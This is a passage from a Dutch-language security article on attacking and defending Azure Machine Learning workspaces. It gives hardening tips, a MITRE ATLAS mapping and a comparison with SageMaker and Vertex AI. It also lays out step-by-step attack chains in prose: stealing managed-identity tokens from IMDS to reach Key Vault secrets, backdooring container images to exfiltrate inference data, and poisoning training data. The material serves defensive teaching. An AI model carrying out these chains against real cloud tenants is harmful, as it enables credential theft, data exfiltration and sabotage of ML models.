Zet publicNetworkAccess op Disabled voor alle workspace-resources.
Gebruik credential-passthrough voor datastores in plaats van accountsleutels op te slaan in Key Vault.
Schakel ACR content trust in en scan images op kwetsbaarheden voordat je ze uitrolt.
Forceer auth_mode: aad_token op endpoints in plaats van key-based authenticatie.
Schakel Azure Sentinel in met de diagnostische instellingen van de ML-workspace voor beveiligingsmonitoring.
Roteer endpoint-sleutels volgens een regelmatig schema en na elke vermoede compromittering.

Veelvoorkomende aanvalsketens

Echte Azure ML-engagements combineren doorgaans meerdere technieken. Hier zijn veelvoorkomende aanvalsketens, geordend op impact:

Keten 1: Van compute naar overname van het abonnement

1. Initial access via malicious notebook or compromised data scientist credentials
2. Extract managed identity token from IMDS (169.254.169.254)
3. Enumerate role assignments to discover overprivileged identity
4. Access Key Vault secrets (storage keys, API credentials, connection strings)
5. Use storage keys to access blob containers across the subscription
6. Discover secrets in non-ML Key Vaults shared by the managed identity
7. Pivot to databases, APIs, or other services using extracted credentials

Keten 2: Supply-chain-aanval op modellen

1. Enumerate ACR repositories via workspace managed identity
2. Identify inference container images used by production endpoints
3. Pull the target image, inject a backdoor (data exfiltration layer)
4. Push the modified image with the same tag (no immutability)
5. Trigger endpoint redeployment (or wait for next scheduled update)
6. Backdoored model now exfiltrates inference data to attacker C2

Keten 3: Manipulatie van de trainingspipeline

1. Access workspace via compromised compute instance
2. Enumerate datastores and identify training data locations
3. Modify training data in blob storage to inject backdoor examples
4. Wait for scheduled retraining pipeline to execute
5. Backdoored model is registered in model registry
6. Backdoored model is deployed to production endpoint

MITRE ATLAS-mapping voor Azure ML-aanvallen

Aanvalstechniek	ATLAS-ID	Azure ML-specifieke context
IMDS managed-identity-tokenextractie	AML.TA0002 (Initial Access)	Workspace-MI met brede RBAC-scope
Datastore-inventarisatie	AML.T0000 (Search for Victim's Data)	Geregistreerde datastores onthullen alle verbonden opslag
Endpoint-onderzoek	AML.T0002 (Active Scanning)	Endpoints kunnen key-based auth gebruiken zonder rotatie
Modelextractie via endpoint	AML.T0024 (Model Extraction)	Online-endpoints die modelvoorspellingen leveren
ACR-image-manipulatie	AML.T0018 (Backdoor ML Model)	Vervang trainings-/inference-images in ACR
Key Vault laterale beweging	AML.TA0008 (Collection)	Workspace-Key Vault slaat cross-service-secrets op
Datavergiftiging van trainingsdata via blob	AML.T0020 (Data Poisoning)	Wijzig trainingsdata in verbonden blob-opslag

Cross-platform-vergelijking

Aanvalsvector	Azure ML	AWS SageMaker	GCP Vertex AI
Credentialbron	IMDS (managed identity)	IMDS (IAM role)	Metadata server (SA token)
Primaire opslag	Blob Storage / ADLS	S3	GCS
Container registry	Azure Container Registry	Amazon ECR	Artifact Registry
Secret management	Key Vault (auto-created)	Secrets Manager / SSM	Secret Manager
Netwerkisolatie	VNet + Private Endpoints	VPC + VPC Endpoints	VPC-SC + Private Google Access
Grootste risico	Key Vault cross-service-blootstelling	IAM-role-overprivilegering	Service account `Editor`-rol

Gerelateerde onderwerpen

Cloud-AI-infrastructuur -- Cross-platform-overzicht
GCP Vertex AI -- GCP-vergelijking
AWS SageMaker -- AWS-vergelijking

Referenties

Azure Machine Learning Security Baseline - Microsoft (2024) - Official security configuration guidance
"Securing Azure Machine Learning Workspaces" - Microsoft Learn (2024) - Workspace isolation and access control
"Managed Identity Best Practices" - Microsoft (2024) - Guidance on limiting managed identity scope
"Azure Security Benchmark v3" - Microsoft (2023) - Cross-service security controls applicable to Azure ML

Knowledge Check

Wat maakt de Key Vault-integratie van Azure ML tot een belangrijk aanvalsoppervlak?

Azure ML-aanvalsoppervlak

Gerelateerde artikelen

Azure ML-aanvalsoppervlak

Gerelateerde artikelen